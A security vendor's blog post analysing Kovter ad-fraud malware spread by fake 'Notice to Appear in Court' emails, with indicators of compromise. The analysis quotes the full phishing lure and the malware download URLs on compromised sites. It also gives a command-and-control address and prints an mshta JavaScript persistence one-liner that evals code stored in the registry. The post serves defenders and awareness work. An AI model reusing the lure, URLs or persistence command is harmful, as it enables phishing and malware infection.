Kovter expanding bot through emails bearing ‘court notices’ – Performanta’s case study

Kovter expanding bot through emails bearing ‘court notices’ – Performanta’s case study

Category : Threat Analysis

On the weekend of the 11th of July some suspicious emails holding the subject of ‘Notice to Appear in Court’ were sent out to some of our key employees. The messages were allegedly originating from the ‘District Court’ and held a zipped attachment. Performanta Labs instigated some analysis and confirmed it was a threat. Following up with more rigorous analysis we determined that it was the Kovter Ad Fraud bot which also appeared to be spreading on the 10th of July via a malvertizing campaign.

At the current state of the threat landscape where adversaries segment scatter attacks for profit in order to remain undetected for longer periods of time, it’s becoming more challenging to differentiate crimeware attacks that utilise well known bots from what could potentially be an attack that specifically targets your data. At first glance, this attack appeared to be a targeted attack aimed specifically at Performanta; the Kovter threat had initial zero antivirus detection rate and kept having low detection rates in the following days (a known property for malware these days), it utilised infection methods like ‘process hollowing’ (seen in threats like Stuxnet) and downloaded Microsoft PowerShell. As the lines between crimeware and threats that target your data become more blurry, thorough analysis is paramount to gain context and understand threats in greater detail.

At Performanta, we specialise in professional services for an array of security products, we posses an acute understanding the current threat landscape and believe targeted attacks to be a common property that may affect organisations of all sizes. We educate our customers in the same manner and believe that exposing this type of data is essential – as it can help raise awareness and education against the scourge of cybercrime.

In an attempt to raise awareness, this blog is going to include some tangible information followed by indicators of compromise for this specific attack. We sincerely wish to educate the security community and help create context for anybody else that may have encountered this type of cyber attack.

The Email Lure

The malicious emails were sent during the early hours on Saturday the 11th of July. The subject of the emails (‘Notice to Appear in Court’) and the body of the messages didn’t appear to have any grammatical mistakes.

Inside the attached ZIP file resided a JavaScript file that ended with a double extension of a ‘doc.js’, the file held the following format where the X’s below represent different digits: Court_Notification_XXXXXXXX.doc.js

court_email

jsfile

(Full text of the email message is included to help with incoming web search of affected parties or researchers)

Subject: Notice to Appear in Court

Notice to Appear,

This is to inform you to appear in the Court on the July 15 for your case hearing. Please, prepare all the documents relating to the case and bring them to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.

The copy of Court Notice is attached to this email.

Regards,
Jon Cross,
Clerk of Court.

Examining the file revealed some obfuscated JavaScript which clearly intended to evade detection (see picture below); the obfuscated JavaScript held 229 functions that returned different fragments of code, each was called in order by the script to assemble a second layer of malicious code. After DEobfuscating the code (third image below), we could see the intention of the script. The script instantiates the WScript.Shell,  MSXML2.XMLHTTP and the ADODB.Stream objects for the purpose of downloading an executable file to the local machine and executing it using the Microsoft Windows Script Host file wscript.exe (resides under Windows\System32) which is represented by the WScript.Shell object in the script.

The script attempts to download malicious executable files from three different hosts that appear to be compromised websites, the files are downloaded to the %TEMP% folder and their names are comprised of digits only (for e.g. 37845366.exe).

The crafted URL by the script attempts to download files from the next three websites:

  • avolonage.com
  • mrflapper.com
  • iconic.com.mx

The value of the stroke variable (seen at the top of the first image below), is used in the URL as the parameter value for the &id variable and in return the web-server returns the malicious file, this is done so that only the script can download the files. A simple detection evasion technique was spotted as the web-server attempted to masquerade the malicious executable files as images, this was done by including a filename with the GIF extension in the HTTP header content disposition field (see bottom image).

Here are some examples of calls from the script to download the malicious files:

avolonage.com/document.php?rnd=3881&id=5556535E0D0A020B24140116020B1609050A10054A070B09

mrflapper.com/document.php?rnd=2953&id=5556535E0D0A020B24140116020B1609050A10054A070B09

iconic.com.mx/document.php?rnd=2953&id=5556535E0D0A020B24140116020B1609050A10054A070B09

Virus total scan for the websites in order: 1 2 3

obfuscated_code

Obfuscated Code

obfuscated_code_function_calls

Obfuscated Code – the decryption routine that assembles the second layer of malicious code

deobfuscated_code

Deobfuscated Code

packet_capture

Evasion attempt, executable is reported by the web-server as image file


Post Infection Activity – Utilising Windows PowerShell and downloading Flash Player

When the file is launched from the %TEMP% folder by Microsoft Windows Script Host, the threat executes a legitimate Windows program under \Windows\System32 called dllhost.exe , following the execution the threat utilises a method known as ‘process hollowing’ (‘process hollowing’ is a technique used by some malware in which a legitimate process is loaded on the system to contain and be loaded with malicious code  – more details here).

The threat then starts another dllhost.exe process, this process appears to be a watchdog over the parentdllhost.exe process which acts as the main module. The threat ‘calls home’ and signals a successful infection to the Kovter command and control server by initiating an HTTP POST with some data to the next IP address 155.94.67.5/upload.php.

The folks at Malwarebytes noticed a Malvertizing campaign that dropped Kovter on the 10th of July, the threat checks in to the same IP at 155.94.67.5

bot_checkin

Kovter spread through a Malvertizing campaign and calling back home. Credit: Malwarebytes

Kovter spawns different sub processes to complete certain tasks and to remain persistent on the computer. In order to remain persistent, at the initial infection stages and following the hollowing of the dllhost.exe process, it generates a random name made out of letters to be used as a name to a folder that it creates under the logged user’s Local Settings Application Data folder (normally \Documents and Settings\%username%\Local Settings\Application Data), it then copies a version of itself to that folder and gives the generated executable copied the same random name it used for the folder. In order to persist and survive a system reboot two auto-startup RUN registry key are created under the local user and the local machine, the registry key name is empty or null (may appear as closing square brackets [ ] in some tools).

The threat has also been seen utilising Microsoft HTML Application Host (mshta.exe) to auto start under the RUN registry key, here is an example of how it looks like in the registry value:

mshta javascript:bwliEDx7="Y9XfkLou";h7w=new%20ActiveXObject("WScript.Shell");seH4zcNQB="cN0sd";OWn3D=h7w.RegRead("HKLM\\software\\391691ad\\bb7bf441");umA2XZZqV6="q0FdMt";eval(OWn3D);nzDyV7KI="v"; 

Following a successful infection, the threat starts polling a long list of IP addresses that appear to be part of the bot (the IPs are listed in the Indicators of compromise section at the bottom of the blog). We examined the threat under Windows XP and one of its interesting traits is the download and silent install of The Windows Management Framework from Microsoft’s website, the installation is followed with the initiation of a framework update. One of the key features of that framework is PowerShell which is an advanced command line tool for Windows that enables power users to remotely or locally administer a machine, as such, it is considered to be a very effective post exploitation utility employed by both penetration testers and black-hats.  

It was also observed that Kovter downloaded the latest version of Flash Player. A blog post by Kafeine assumed that adversaries simply try to ‘patch’ security holes on the system to avoid possible infection of other competing bots, it was noted on that same post Kovter probably does that to maximise its revenue by displaying Flash video ads which is more profitable than the usual simple pop-up commercial ads.

infection_post

Post infection traffic

runkey

Entries under the Registry RUN key for the local user and the local machine

Summary

In this blog we analysed what appears to be a targeted attack aimed to expand a well-known bot called Kovter. This attack is a good reminder that low volume attacks, regardless if they utilise known malware or not, are a common property and relevant to any business size or industry vertical. The fact that Kovter impacts businesses and utilises power tools like PowerShell, increases the risk levels of an infection as it opens more options for adversaries to expand their business model and glean business data. We hope that you found this post educational and helpful in giving more context about this attack.

Please feel free to share this post within your social community and help improve awareness and understanding. You could potentially save a relative, friend or colleague from being an unsuspecting victim of such an attack.

Indicators of Compromise

Infection URLs:

avolonage.com/document.php?rnd=3881&id=5556535E0D0A020B24140116020B1609050A10054A070B09

mrflapper.com/document.php?rnd=2953&id=5556535E0D0A020B24140116020B1609050A10054A070B09

iconic.com.mx/document.php?rnd=2953&id=5556535E0D0A020B24140116020B1609050A10054A070B09

Initial File Hashes (for reference only, Kovter is polymorphic, hashes change regularly):
SHA1: 28594191d330cdba4dad6700a1ea63f7ed60437c
SHA1: 16345198d772ca3cfb28c63fbfe04fb4813796b5

Registry Keys :
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\[]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\[]

Threat Local Files:
%USERPROFILE%\Local Settings\Application Data\<random-alphabetical-name>\<random-alphabetical-name.exe>

Legitimate Local Folders & Files:
%WINDIR%\system32\windowspowershell\
%WINDIR%\system32\winrm\
%WINDIR%\system32\WsmSvc.dll

Command and Control URL:
155.94.67.5/upload.php

Other Network Traffic Seen initiated by Kovter (not confirmed as malicious):
Pastebin link